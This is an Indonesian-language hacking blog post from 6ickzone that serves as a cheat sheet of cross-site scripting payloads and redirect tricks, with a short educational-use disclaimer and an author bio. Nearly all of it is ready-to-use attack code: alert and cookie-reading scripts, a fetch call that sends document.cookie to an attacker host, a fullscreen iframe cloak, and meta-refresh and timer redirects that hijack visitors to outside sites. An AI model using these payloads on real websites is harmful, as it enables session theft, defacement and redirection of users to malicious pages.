Mengenal Berbagai Payload XSS dan Varian Redirect

6ickzone 0
Mengenal Berbagai Payload XSS dan Varian Redirect

Mengenal Berbagai Payload XSS dan Varian Redirect

Author: 0x6ick

Basic xss: Basic Xss

1. Payload XSS Klasik

<script>alert(1)</script>

"><img src=x onerror=alert(1)>

2. Payload untuk Uji Cookie dan Akses Objek

<script>alert(document.cookie)</script>

<script>alert(Object.keys(window))</script>

<script>alert(Object.getOwnPropertyNames(window))</script>

3. Meta Refresh Redirect (Oldschool + SEO Friendly)

<meta http-equiv="refresh" content="3; url=https://attacker-site.com">

4. Iframe Fullscreen + Auto Redirect (Stealth Cloak Style)

<div style="position:absolute;top:0;left:0;width:100%;height:100%;z-index:9999">

  <iframe src="https://0x6ick.zone.id/search/label/Tools?m=1" width="100%" height="100%"></iframe>

</div>

5. History Manipulation + Timer Redirect

<script>

  history.pushState({}, '', '/404');

  setTimeout(function() {

    window.location.replace("https://www.0x6ick.zone.id/search/label/Tools?m=1");

  }, 3000);

</script>

6. Payload Obfuscation & Exfiltration

<script>fetch('https://attacker.site/log?c='+document.cookie)</script>

7. DOM-Based XSS Sample

Contoh serangan yang memanfaatkan URL hash:

index.html#<script>alert(1)</script>

8. Tips Bug Hunting XSS

  • Gunakan tools seperti Burp Suite, xsser, DalFox
  • Uji dengan berbagai encoding & bypass trick
  • Perhatikan behavior browser terhadap tag tidak umum

Disclaimer

⚠️ Disclaimer

This article is intended solely for educational purposes only.The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this .

"Where creativity, exploitation, and expression collide." — 6ickZone

Tags

6ickzone

I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.

Post a Comment

Posting Komentar

Lebih baru Lebih lama

Mengenai Saya

Foto saya
6ickzone
I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.
Lihat profil lengkapku

Cari Blog Ini

About